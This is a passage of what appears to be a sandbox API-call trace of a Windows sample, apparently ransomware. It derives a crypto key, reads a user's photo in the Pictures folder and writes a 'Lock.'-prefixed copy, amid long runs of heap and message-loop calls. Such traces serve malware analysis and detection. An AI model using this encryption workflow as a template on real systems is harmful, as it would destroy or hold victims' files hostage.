lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab338, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.447] CryptDeriveKey (in: hProv=0xa7c7f8, Algid=0x6601, hBaseData=0x9e1ab8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2138) returned 1 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.452] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.452] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.452] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.452] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.452] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6ee0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.452] CryptDestroyHash (hHash=0x9e1ab8) returned 1 [0209.452] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.453] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/cwsPQYJwproUEWJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cwspqyjwprouewj.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.454] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.454] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7000 [0209.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0209.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74268 [0209.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.456] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74268 | out: hHeap=0x2af0000) returned 1 [0209.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.cwsPQYJwproUEWJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.cwspqyjwprouewj.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.457] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0209.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.457] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.457] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.458] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.458] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50e5020 [0209.461] SetFilePointerEx (in: hFile=0x4dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.461] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0209.464] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x2289, lpOverlapped=0x0) returned 1 [0209.464] ReadFile (in: hFile=0x4dc, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12289) returned 0x2aae878 [0209.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e5020 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.469] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0209.469] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12289) returned 0x2ac0b10 [0209.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.470] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.470] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.470] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.471] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12289) returned 0x2aae878 [0209.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.471] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.472] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0209.472] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0209.472] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.472] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.472] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0209.473] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.473] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12289) returned 0x2aae878 [0209.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.474] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.474] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12289) returned 0x37c0048 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0209.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 